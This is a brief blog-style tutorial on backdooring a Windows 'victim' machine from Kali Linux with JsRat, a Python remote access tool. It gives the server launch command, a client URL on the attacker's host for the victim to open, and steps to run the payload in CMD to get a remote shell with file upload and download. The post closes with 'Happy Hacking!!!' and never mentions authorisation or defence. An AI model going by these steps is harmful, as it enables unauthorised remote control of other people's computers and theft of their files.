jsrat
Security

Tool Used To Control Victim Computer Remotely

The tool known as JsRat, is a python based script developed to backdoor victim machine using JavaScript payloads and the HTTP protocol for communication between the server and the target hosts.

We are going to use kali linux ( Attacker Machine) and Windows (victim Machine) to show try the attack.

Installation & Setup :

  1. You can download the JSRAT tool Here

Screenshot-jsrat1

2. Next you download and give appropriate permission to execute the script. Above figure shows the complete installation from github.

Starting the web server:

Now lets start the web server

3. Run and execute the command in the terminal: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080

Screenshot-jsrat2

4. JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf

5. Open this Client command URL with Victim browser

Screenshot-jsrat3

6. To gain the shell payload generated by URL should be opened with CMD.

7. Once the command is executed a shell will be obtained.

8. When we go back to the attacker machine, bingo!!! Here we go !!! We have connected with Victim machine and get hold of the computer.

Screenshot-jsrat4

We can try some windows command to do anything we want with the system. Commands like ipconfig.

JSRat can also provide upload, Read and Download files.Happy Hacking!!!

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.